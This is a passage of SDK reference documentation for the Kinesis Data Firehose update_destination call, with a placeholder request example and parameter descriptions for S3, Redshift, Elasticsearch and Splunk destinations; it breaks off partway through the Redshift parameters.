Use this operation to change the destination type (for example, to replace the Amazon S3 destination with Amazon Redshift) or change the parameters associated with a destination (for example, to change the bucket name of the Amazon S3 destination). The update might not occur immediately. The target delivery stream remains active while the configurations are updated, so data writes to the delivery stream can continue during this process. The updated configurations are usually effective within a few minutes.
Switching between Amazon ES and other services is not supported. For an Amazon ES destination, you can only update to another Amazon ES destination.
If the destination type is the same, Kinesis Data Firehose merges the configuration parameters specified with the destination configuration that already exists on the delivery stream. If any of the parameters are not specified in the call, the existing values are retained. For example, in the Amazon S3 destination, if EncryptionConfiguration is not specified, then the existing EncryptionConfiguration is maintained on the destination.
If the destination type is not the same, for example, changing the destination from Amazon S3 to Amazon Redshift, Kinesis Data Firehose does not merge any parameters. In this case, all parameters must be specified.
Kinesis Data Firehose uses CurrentDeliveryStreamVersionId to avoid race conditions and conflicting merges. This is a required field, and the service updates the configuration only if the existing configuration has a version ID that matches. After the update is applied successfully, the version ID is updated, and can be retrieved using DescribeDeliveryStream . Use the new version ID to set CurrentDeliveryStreamVersionId in the next call.
See also: AWS API Documentation
Exceptions
:example: response = client.update_destination(
DeliveryStreamName='string',
CurrentDeliveryStreamVersionId='string',
DestinationId='string',
S3DestinationUpdate={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ExtendedS3DestinationUpdate={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupUpdate': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
RedshiftDestinationUpdate={
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'Password': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3Update': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupUpdate': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ElasticsearchDestinationUpdate={
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3Update': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
SplunkDestinationUpdate={
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3Update': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
}
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type CurrentDeliveryStreamVersionId: string
:param CurrentDeliveryStreamVersionId: [REQUIRED]\nObtain this value from the VersionId result of DeliveryStreamDescription . This value is required, and helps the service perform conditional operations. For example, if there is an interleaving update and this value is null, then the update destination fails. After the update is successful, the VersionId value is updated. The service then performs a merge of the old configuration with the new configuration.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the destination.\n
:type S3DestinationUpdate: dict
:param S3DestinationUpdate: [Deprecated] Describes an update for a destination in Amazon S3.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ExtendedS3DestinationUpdate: dict
:param ExtendedS3DestinationUpdate: Describes an update for a destination in Amazon S3.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --Enables or disables Amazon S3 backup mode.\n\nS3BackupUpdate (dict) --The Amazon S3 destination for backup.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nDataFormatConversionConfiguration (dict) --The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.\n\nSchemaConfiguration (dict) --Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.\n\nRoleARN (string) --The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.\n\nCatalogId (string) --The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.\n\nDatabaseName (string) --Specifies the name of the AWS Glue database that contains the schema for the output data.\n\nTableName (string) --Specifies the AWS Glue table that contains the column information that constitutes your data schema.\n\nRegion (string) --If you don\'t specify an AWS Region, the default is the current Region.\n\nVersionId (string) --Specifies the table version for the output data schema. If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.\n\n\n\nInputFormatConfiguration (dict) --Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.\n\nDeserializer (dict) --Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.\n\nOpenXJsonSerDe (dict) --The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.\n\nConvertDotsInJsonKeysToUnderscores (boolean) --When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is 'a.b', you can define the column name to be 'a_b' when using this option.\nThe default is false .\n\nCaseInsensitive (boolean) --When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.\n\nColumnToJsonKeyMappings (dict) --Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {'ts': 'timestamp'} to map this key to a column named ts .\n\n(string) --\n(string) --\n\n\n\n\n\n\nHiveJsonSerDe (dict) --The native Hive / HCatalog JsonSerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.\n\nTimestampFormats (list) --Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.\n\n(string) --\n\n\n\n\n\n\n\n\nOutputFormatConfiguration (dict) --Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.\n\nSerializer (dict) --Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.\n\nParquetSerDe (dict) --A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nPageSizeBytes (integer) --The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.\n\nCompression (string) --The compression code to use over data blocks. The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.\n\nEnableDictionaryCompression (boolean) --Indicates whether to enable dictionary compression.\n\nMaxPaddingBytes (integer) --The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.\n\nWriterVersion (string) --Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .\n\n\n\nOrcSerDe (dict) --A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .\n\nStripeSizeBytes (integer) --The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nRowIndexStride (integer) --The number of rows between index entries. The default is 10,000 and the minimum is 1,000.\n\nEnablePadding (boolean) --Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .\n\nPaddingTolerance (float) --A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.\nFor the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.\nKinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .\n\nCompression (string) --The compression code to use over data blocks. The default is SNAPPY .\n\nBloomFilterColumns (list) --The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .\n\n(string) --\n\n\nBloomFilterFalsePositiveProbability (float) --The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.\n\nDictionaryKeyThreshold (float) --Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.\n\nFormatVersion (string) --The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .\n\n\n\n\n\n\n\nEnabled (boolean) --Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.\n\n\n\n\n
:type RedshiftDestinationUpdate: dict
:param RedshiftDestinationUpdate: Describes an update for a destination in Amazon Redshift.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nClusterJDBCURL (string) --The database connection string.\n\nCopyCommand (dict) --The COPY command.\n\nDataTableName (string) -- [REQUIRED]The name of the target table. The table must already exist in the database.\n\nDataTableColumns (string) --A comma-separated list of column names.\n\nCopyOptions (string) --Optional parameters to use with the Amazon Redshift COPY command. For more information, see the 'Optional Parameters' section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:\n\ndelimiter \'\\t\' lzop; - fields are delimited with 't' (TAB character) and compressed using lzop.delimiter \'|\' - fields are delimited with '|' (this is the default delimiter).\ndelimiter \'|\' escape - the delimiter should be escaped.\nfixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.\nJSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.\n\nFor more examples, see Amazon Redshift COPY command examples .\n\n\n\nUsername (string) --The name of the user.\n\nPassword (string) --The user password.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).\n\nDurationInSeconds (integer) --The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.\n\n\n\nS3Update (dict) --The Amazon S3 destination.\nThe compression formats SNAPPY or ZIP cannot be specified in RedshiftDestinationUpdate.S3Update because the Amazon Redshift COPY operation that reads from the S3 bucket doesn\'t support these compression formats.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --The Amazon S3 backup mode.\n\nS3BackupUpdate (dict) --The Amazon S3 destination for backup.\n\nRoleARN (string) --The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) --The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch 